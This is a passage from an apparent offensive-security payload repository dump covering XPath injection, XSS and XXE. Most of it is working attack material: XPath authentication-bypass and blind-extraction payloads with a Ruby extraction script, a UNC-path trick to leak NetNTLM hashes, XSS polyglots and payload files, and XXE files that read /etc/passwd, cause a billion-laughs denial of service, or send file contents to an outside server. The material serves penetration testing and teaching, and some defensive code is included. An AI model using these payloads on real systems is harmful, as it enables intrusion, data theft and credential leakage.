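    cookies.load(h.get("cookie", ""))
    session_id = cookies["session"].value if "session" in cookies else None
    expected = SESSION_TOKENS.get(session_id)
    if expected is None:
        return False, "no session"
    token = presented_token(target, h)
    if token is None or not hmac.compare_digest(token, expected):
        return False, "csrf token mismatch"
    return True, "ok"


# Constructed handshakes: the legitimate page, and the attacker's page from the
# CSWSH description (the cookie rides along automatically, the token does not).
LEGIT_HEADERS = {
    "Host": "app.example.com",
    "Upgrade": "websocket",
    "Connection": "Upgrade",
    "Origin": "https://app.example.com",
    "Cookie": "session=s3ss10n",
    "Sec-WebSocket-Protocol": "chat, token.tok-7f3a9c",
}
HIJACK_HEADERS = dict(LEGIT_HEADERS, Origin="https://attacker.example")
HIJACK_HEADERS.pop("Sec-WebSocket-Protocol")

if __name__ == "__main__":
    print(validate_handshake("/ws", LEGIT_HEADERS))   # (True, 'ok')
    print(validate_handshake("/ws", HIJACK_HEADERS))  # (False, 'origin not allowed')
```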
61 | 
## References

- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)



--------------------------------------------------------------------------------
/XPATH Injection/README.md:
--------------------------------------------------------------------------------
# XPATH injection

> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.

## Summary

* [Exploitation](#exploitation)
* [Blind exploitation](#blind-exploitation)
* [Out Of Band Exploitation](#out-of-band-exploitation)
* [Tools](#tools)
* [References](#references)

## Exploitation

Similar to SQL injection: the vulnerable pattern is a query built by string concatenation, e.g. `"string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())"`

```sql
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
```
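The fix on the application side is to keep user input inside an XPath string literal. As an added example (not code from the page), `xpath_literal()` below renders any value as a valid XPath 1.0 literal, including values with both quote kinds, and `outside_literals()` shows that the first payload above changes the query's syntax under the concatenated build but not under the literal-safe one.

```python
"""Building XPath queries from untrusted input without breaking out of literals.

Added example, not code from the page. vulnerable_query() reproduces the
concatenated query quoted above; safe_query() wraps each value with xpath_literal()."""


def xpath_literal(value):
    """Return an XPath 1.0 string literal that evaluates to exactly `value`.

    XPath 1.0 literals have no escape character, so a value containing one quote
    kind is wrapped in the other, and a value containing both is split with concat()."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = []
    for chunk in value.split("'"):
        if chunk:
            parts.append("'%s'" % chunk)  # chunk holds no single quotes
        parts.append('"\'"')              # the single quote that ended the chunk
    parts.pop()                           # no quote follows the final chunk
    return "concat(%s)" % ", ".join(parts)


def vulnerable_query(user, password):
    """The concatenation shown on this page: a quote in the input ends the literal."""
    return ("string(//user[name/text()='" + user +
            "' and password/text()='" + password + "']/account/text())")


def safe_query(user, password):
    """Same query with both values rendered as literals, so user text can never
    become operators or predicates. Where the XPath engine supports variable
    binding (e.g. lxml's xpath(expr, name=user)), prefer that over string building."""
    return "string(//user[name/text()=%s and password/text()=%s]/account/text())" % (
        xpath_literal(user), xpath_literal(password))


def outside_literals(query):
    """Return the query text that is NOT inside a string literal, i.e. the part
    the XPath engine parses as syntax. Confirms whether input stayed confined."""
    out, quote = [], None
    for ch in query:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        else:
            out.append(ch)
    return "".join(out)


def injection_escaped(builder, payload):
    """True if the payload's ' or ' ends up in XPath syntax (the injection worked)."""
    return " or " in outside_literals(builder(payload, "x"))


if __name__ == "__main__":
    PAYLOAD = "' or '1'='1"  # first payload in the list above
    print(injection_escaped(vulnerable_query, PAYLOAD))  # True
    print(injection_escaped(safe_query, PAYLOAD))        # False
```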
35 | 
36 | ## Blind Exploitation
37 | 
38 | 1. Size of a string
39 |     ```sql
40 |     and string-length(account)=SIZE_INT
41 |     ```
42 | 2. Extract a character, one position at a time (`codepoints-to-string()` only exists in XPath 2.0 engines; against XPath 1.0 compare with a literal character)
43 |     ```sql
44 |     substring(//user[userid=5]/username,2,1)=CHAR_HERE
45 |     substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
46 |     ```
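
The concatenated query from the Exploitation section and the two blind-extraction steps above, put together as an added example (not code from the original page). It runs the vulnerable lookup with Ruby's stdlib REXML XPath 1.0 engine against a constructed two-user XML document; the user data, the `lookup_account`/`oracle`/`blind_extract` helpers and the `$name`/`$password` variable binding in the hardened version are assumptions for illustration.

```ruby
require 'rexml/document'

# Constructed sample user store standing in for the application's XML file
# (hypothetical data, not from the original page).
USERS_XML = <<~XML
  <users>
    <user>
      <userid>1</userid>
      <name>alice</name>
      <password>s3cret</password>
      <account>alice-acct</account>
    </user>
    <user>
      <userid>5</userid>
      <name>bob</name>
      <password>hunter2</password>
      <account>bob-acct</account>
    </user>
  </users>
XML

DOC = REXML::Document.new(USERS_XML)
QUERY_LOG = [] # every XPath expression the "application" evaluated

# Vulnerable login lookup: user input is spliced straight into the XPath
# expression, the pattern quoted in the Exploitation section.
# Returns the account name of the first matching user, or nil.
def lookup_account(name, password)
  query = "//user[name/text()='#{name}' and password/text()='#{password}']/account/text()"
  QUERY_LOG << query
  node = REXML::XPath.first(DOC, query)
  node && node.value
end

# Hardened lookup: the same query with the input bound as XPath variables
# ($name, $password), so quotes in the input never reach the XPath parser.
def lookup_account_safe(name, password)
  query = "//user[name/text()=$name and password/text()=$password]/account/text()"
  node = REXML::XPath.first(DOC, query, nil, { 'name' => name, 'password' => password })
  node && node.value
end

# Boolean oracle for blind extraction. The payload  ' or COND and '1'='1
# goes into both fields, so the predicate becomes
#   name=''  or  COND and '1'='1' and password=''  or  COND and '1'='1'
# which is true exactly when COND is true ("and" binds tighter than "or").
# A true COND matches every user and returns an account; false returns nil.
def oracle(condition)
  payload = "' or #{condition} and '1'='1"
  !lookup_account(payload, payload).nil?
end

# Blind extraction driver: learn the length with string-length(), then one
# character per position with substring(), the two steps listed above.
def blind_extract(target, charset, max_len: 32)
  length = (1..max_len).find { |n| oracle("string-length(#{target})=#{n}") }
  return nil if length.nil?
  (1..length).map do |pos|
    charset.find { |c| oracle("substring(#{target},#{pos},1)='#{c}'") }
  end.join
end

if __FILE__ == $PROGRAM_NAME
  charset = [*'a'..'z', *'0'..'9']
  puts "auth bypass   : #{lookup_account("' or '1'='1", "' or '1'='1").inspect}"
  puts "blind extract : #{blind_extract("//user[userid='5']/password", charset).inspect}"
  puts "queries sent  : #{QUERY_LOG.size}"
  puts "hardened      : #{lookup_account_safe("' or '1'='1", "' or '1'='1").inspect}"
end
```

`QUERY_LOG` is there so you can see what the server would have logged: every oracle call is one full login request, which is why the tools listed below exist. The hardened version is the XPath analogue of a prepared statement; if your engine has no variable binding, the fallback is to reject or escape quote characters before concatenation.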
47 | 
48 | ## Out Of Band Exploitation
49 | 
50 | `doc()` is an XPath 2.0 function (available in XSLT 2.0 / XQuery engines such as Saxon, not in plain XPath 1.0 libraries). Pointing it at a UNC path makes a Windows host open an SMB connection to the attacker's share and leak a NetNTLM hash (see the reference below); an `http://` URL works the same way as a plain out-of-band callback to confirm the injection.
51 | 
52 | ```powershell
53 | http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
54 | ```
53 | 
54 | ## Tools
55 | 
56 | - [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
57 | - [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
58 | - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
59 | - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
60 | - [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
61 | 
62 | ## References
63 | 
64 | * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
65 | * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
66 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/">:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/">


--------------------------------------------------------------------------------
/XSS Injection/Files/'>:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/'>


--------------------------------------------------------------------------------
/XSS Injection/Files/InsecureFlashFile.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/InsecureFlashFile.swf


--------------------------------------------------------------------------------
/XSS Injection/Files/JupyterNotebookXSS.ipynb:
--------------------------------------------------------------------------------
 1 | {
 2 |  "cells": [
 3 |   {
 4 |    "cell_type": "markdown",
 5 |    "metadata": {},
 6 |    "source": [
 7 |     "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n"
 8 |    ]
 9 |   }
10 |  ],
11 |  "metadata": {
12 |   "kernelspec": {
13 |    "display_name": "Python 3",
14 |    "language": "python",
15 |    "name": "python3"
16 |   },
17 |   "language_info": {
18 |    "codemirror_mode": {
19 |     "name": "ipython",
20 |     "version": 3
21 |    },
22 |    "file_extension": ".py",
23 |    "mimetype": "text/x-python",
24 |    "name": "python",
25 |    "nbconvert_exporter": "python",
26 |    "pygments_lexer": "ipython3",
27 |    "version": "3.6.2"
28 |   }
29 |  },
30 |  "nbformat": 4,
31 |  "nbformat_minor": 2
32 | }
33 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS.svg:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 
5 |    
6 |    
9 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS1.svg:
--------------------------------------------------------------------------------
1 | </desc><script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS2.svg:
--------------------------------------------------------------------------------
1 | </foreignObject><script>alert(2)</script>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS3.svg:
--------------------------------------------------------------------------------
1 | </title><script>alert(3)</script>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SWF_XSS.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/SWF_XSS.swf


--------------------------------------------------------------------------------
/XSS Injection/Files/mouseover-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/mouseover-xss-ecs.jpeg


--------------------------------------------------------------------------------
/XSS Injection/Files/onclick-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/onclick-xss-ecs.jpeg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_exif_corrupted.png


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_metadata.jpg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_metadata.png


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_text_xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_text_xss.png


--------------------------------------------------------------------------------
/XSS Injection/Files/xml.xsd:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.cer:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.dtd:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.htm:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.html.demo:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.hxt:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.mno:
--------------------------------------------------------------------------------
1 | alert(1337)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.rdf:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.svgz:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.url.url:
--------------------------------------------------------------------------------
1 | 
2 |     
3 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.vml:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.wsdl:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xht:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xhtml:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xml:
--------------------------------------------------------------------------------
 1 | 
 2 | 	
 3 | 	
 4 | 		alert(1)
 5 | 		alert(2)
 6 | 		
 7 | 		  
 8 | 		    confirm(document.domain)]]>
 9 | 		  
10 | 		    
11 | 		      Hello
12 | 		    
13 | 		    
14 | 		      http://google.com
15 | 		    
16 | 		
17 | 	
18 | 
19 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsd:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsf:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsl:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xslt:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png


--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png


--------------------------------------------------------------------------------
/XSS Injection/Images/DwrkbH1VAAErOI2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Images/DwrkbH1VAAErOI2.jpg


--------------------------------------------------------------------------------
/XSS Injection/Intruders/0xcela_event_handlers.txt:
--------------------------------------------------------------------------------
  1 | FSCommand
  2 | onAbort
  3 | onActivate
  4 | onAfterPrint
  5 | onAfterUpdate
  6 | onBeforeActivate
  7 | onBeforeCopy
  8 | onBeforeCut
  9 | onBeforeDeactivate
 10 | onBeforeEditFocus
 11 | onBeforePaste
 12 | onBeforePrint
 13 | onBeforeUnload
 14 | onBeforeUpdate
 15 | onBegin
 16 | onBlur
 17 | onBounce
 18 | onCellChange
 19 | onChange
 20 | onClick
 21 | onContextMenu
 22 | onControlSelect
 23 | onCopy
 24 | onCut
 25 | onDataAvailable
 26 | onDataSetChanged
 27 | onDataSetComplete
 28 | onDblClick
 29 | onDeactivate
 30 | onDrag
 31 | onDragDrop
 32 | onDragEnd
 33 | onDragEnter
 34 | onDragLeave
 35 | onDragOver
 36 | onDragStart
 37 | onDrop
 38 | onEnd
 39 | onError
 40 | onErrorUpdate
 41 | onFilterChange
 42 | onFinish
 43 | onFocus
 44 | onFocusIn
 45 | onFocusOut
 46 | onHashChange
 47 | onHelp
 48 | onInput
 49 | onKeyDown
 50 | onKeyPress
 51 | onKeyUp
 52 | onLayoutComplete
 53 | onLoad
 54 | onLoseCapture
 55 | onMediaComplete
 56 | onMediaError
 57 | onMessage
 58 | onMouseDown
 59 | onMouseEnter
 60 | onMouseLeave
 61 | onMouseMove
 62 | onMouseOut
 63 | onMouseOver
 64 | onMouseUp
 65 | onMouseWheel
 66 | onMove
 67 | onMoveEnd
 68 | onMoveStart
 69 | onOffline
 70 | onOnline
 71 | onOutOfSync
 72 | onPaste
 73 | onPause
 74 | onPopState
 75 | onProgress
 76 | onPropertyChange
 77 | onReadyStateChange
 78 | onRedo
 79 | onRepeat
 80 | onReset
 81 | onResize
 82 | onResizeEnd
 83 | onResizeStart
 84 | onResume
 85 | onReverse
 86 | onRowDelete
 87 | onRowExit
 88 | onRowInserted
 89 | onRowsEnter
 90 | onScroll
 91 | onSeek
 92 | onSelect
 93 | onSelectStart
 94 | onSelectionChange
 95 | onStart
 96 | onStop
 97 | onStorage
 98 | onSubmit
 99 | onSyncRestored
100 | onTimeError
101 | onTrackChange
102 | onURLFlip
103 | onUndo
104 | onUnload
105 | seekSegmentTime
106 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt:
--------------------------------------------------------------------------------
 1 | alert`1`
 2 | alert(1)
 3 | alert(1)
 4 | alert(1)
 5 | (alert)(1)
 6 | a=alert,a(1)
 7 | [1].find(alert)
 8 | top["al"+"ert"](1)
 9 | top[/al/.source+/ert/.source](1)
10 | al\u0065rt(1)
11 | top['al\145rt'](1)
12 | top['al\x65rt'](1)
13 | top[8680439..toString(30)](1)
14 | navigator.vibrate(500)
15 | eval(URL.slice(-8))>#alert(1)
16 | eval(location.hash.slice(1))>#alert(1)
17 | innerHTML=location.hash>#
18 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/XSS_Polyglots.txt:
--------------------------------------------------------------------------------
 1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
 2 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>
 3 | “ onclick=alert(1)//"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
16 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_payloads_quick.txt:
--------------------------------------------------------------------------------
 1 | javascript:alert(1)//INJECTX
 2 | <svg/onload=alert(1)>//INJECTX
 3 | <img onload=alert(1)>//INJECTX
 4 | <img src=x onerror=prompt(1)>//INJECTX
 5 | <a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a>
 6 |  onmouseover="document.cookie=true;">//INJECTX
 7 | alert(1)>//INJECTX
 8 | <h1>INJECTX</h1>
 9 | <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
10 | <svg><script>/<@/>alert(1)</script>//INJECTX
11 | <svg/onload=alert(/INJECTX/)>
12 | <iframe/onload=alert(/INJECTX/)>
13 | <svg/onload=alert`INJECTX`>
14 | <svg/onload=alert(/INJECTX/)>
15 | <svg/onload=alert(`INJECTX`)>
16 | }alert(/INJECTX/);{//
17 | <h1/onclick=alert(1)>a//INJECTX
18 | <svg/onload=alert(/INJECTX/)>
19 | <p/onclick=alert(/INJECTX/)>a
20 | <svg/onload=alert`INJECTX`>
21 | <svg/onload=alert(/INJECTX/)>
22 | <svg/onload=alert(`INJECTX`)>
23 | <video><source onerror="javascript:alert(1)">//INJECTX
24 | <video onerror="javascript:alert(1)"><source>//INJECTX
25 | <audio onerror="javascript:alert(1)"><source>//INJECTX
26 | <input autofocus onfocus=alert(1)>//INJECTX
27 | <select autofocus onfocus=alert(1)>//INJECTX
28 | <textarea autofocus onfocus=alert(1)>//INJECTX
29 | <keygen autofocus onfocus=alert(1)>//INJECTX
30 | <button form=test onformchange=alert(1)>//INJECTX
31 | <form><button formaction="javascript:alert(1)">//INJECTX
32 | <svg onload=(alert)(1) >//INJECTX
33 | <script>$=1,alert($)</script>//INJECTX
34 | <!--<img src="--><img src=x onerror=alert(1)//">//INJECTX
35 | <img/src='x'onerror=alert(1)>//INJECTX
36 | <marquee/onstart=alert(1)>//INJECTX
37 | <script>alert(1)//INJECTX
38 | <script>alert(1)<!--INJECTX
39 | <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_swf_fuzz.txt:
--------------------------------------------------------------------------------
 1 | #getURL,javascript:alert(1)
 2 | #goto,javascript:alert(1)
 3 | ?javascript:alert(1)
 4 | ?alert(1)
 5 | ?getURL(javascript:alert(1))
 6 | ?asfunction:getURL,javascript:alert(1)//
 7 | ?getURL,javascript:alert(1)
 8 | ?goto,javascript:alert(1)
 9 | ?clickTAG=javascript:alert(1)
10 | ?url=javascript:alert(1)
11 | ?clickTAG=javascript:alert(1)&TargetAS=
12 | ?TargetAS=javascript:alert(1)
13 | ?skinName=asfunction:getURL,javascript:alert(1)//
14 | ?baseurl=asfunction:getURL,javascript:alert(1)//
15 | ?base=javascript:alert(0)
16 | ?onend=javascript:alert(1)//
17 | ?userDefined=');function someFunction(a){}alert(1)//
18 | ?URI=javascript:alert(1)
19 | ?callback=javascript:alert(1)
20 | ?getURLValue=javascript:alert(1)
21 | ?goto=javascript:alert(1)
22 | ?pg=javascript:alert(1)
23 | ?page=javascript:alert(1)
24 | ?playerready=alert(document.cookie)
25 | 


--------------------------------------------------------------------------------
/XSS Injection/XSS with Relative Path Overwrite.md:
--------------------------------------------------------------------------------
 1 | # XSS with Relative Path Overwrite - IE 8/9 and lower
 2 | 
 3 | You need these three components:
 4 | 
 5 | 1. A stored XSS that allows CSS injection: `{}*{xss:expression(open(alert(1)))}`
 6 | 2. URL rewriting, so that `/page.php/anything/` is still served by `page.php`
 7 |    (the browser then treats `anything` as a directory)
 8 | 3. A relative path to the style sheet: `../style.css`
 9 | 
10 | 
11 | A small example:
12 | 
13 | ```html
14 | http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
15 | <html>
16 | <head>
17 | <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
18 | <link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
19 | </head>
20 | <body>
21 | Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
22 | </body>
23 | </html>
24 | ```
25 | 
26 | Explanation of the vulnerability, quoted from the original write-up:
27 | 
28 | > The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))} is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
29 | > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
30 | 
31 | Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
32 | Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
33 | MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
34 | 
35 | From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
36 | 
37 | ## Mutated XSS for Browser IE8/IE9
38 | 
39 | ```html
40 | <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
41 | <script>alert(document.getElementById('x').innerHTML)</script>
42 | ```
43 | 
44 | In IE 8/9, reading the `innerHTML` of a `<listing>` element returns its entity-encoded content decoded, so `&lt;img ...&gt;` comes back as a real `<img src=1 onerror=alert(1)>` tag. Any code that copies that string back into the DOM (a sanitiser round-trip, a rich-text editor) executes the mutated payload.
45 | 
46 | 
47 | ## References
48 | 
49 | - [RPO - Gareth Heyes, March 21, 2014](http://www.thespanner.co.uk/2014/03/21/rpo/)


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE - etc passwd.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <!DOCTYPE data [
3 | <!ELEMENT data ANY>
4 | <!ENTITY file SYSTEM "file:///etc/passwd">
5 | ]>
6 | <data>&file;</data>
7 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE B64 Encoded.xml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
2 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <!DOCTYPE data [
3 | <!ELEMENT data ANY>
4 | <!ENTITY file SYSTEM "file:///sys/power/image_size">
5 | ]>
6 | <data>&file;</data>


--------------------------------------------------------------------------------
/XXE Injection/Files/Deny Of Service - Billion Laugh Attack:
--------------------------------------------------------------------------------
1 | <!DOCTYPE data [
2 | <!ENTITY a0 "dos" >
3 | <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
4 | <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
5 | <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
6 | <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
7 | ]>
8 | <data>&a4;</data>


--------------------------------------------------------------------------------
/XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml:
--------------------------------------------------------------------------------
1 | XXE OOB Attack (Yunusov, 2013)
2 | <?xml version="1.0" encoding="utf-8"?>
3 | <!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
4 | <data>&send;</data>
5 | 
6 | File stored on http://publicServer.com/parameterEntity_oob.dtd
7 | <!ENTITY % file SYSTEM "file:///sys/power/image_size">
8 | <!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
9 | %all;


--------------------------------------------------------------------------------
/XXE Injection/Files/XXE PHP Wrapper.xml:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 2 | <contacts>
 3 |   <contact>
 4 |     <name>Jean &xxe; Dupont</name>
 5 |     <phone>00 11 22 33 44</phone>
 6 |     <address>42 rue du CTF</address>
 7 |     <zipcode>75000</zipcode>
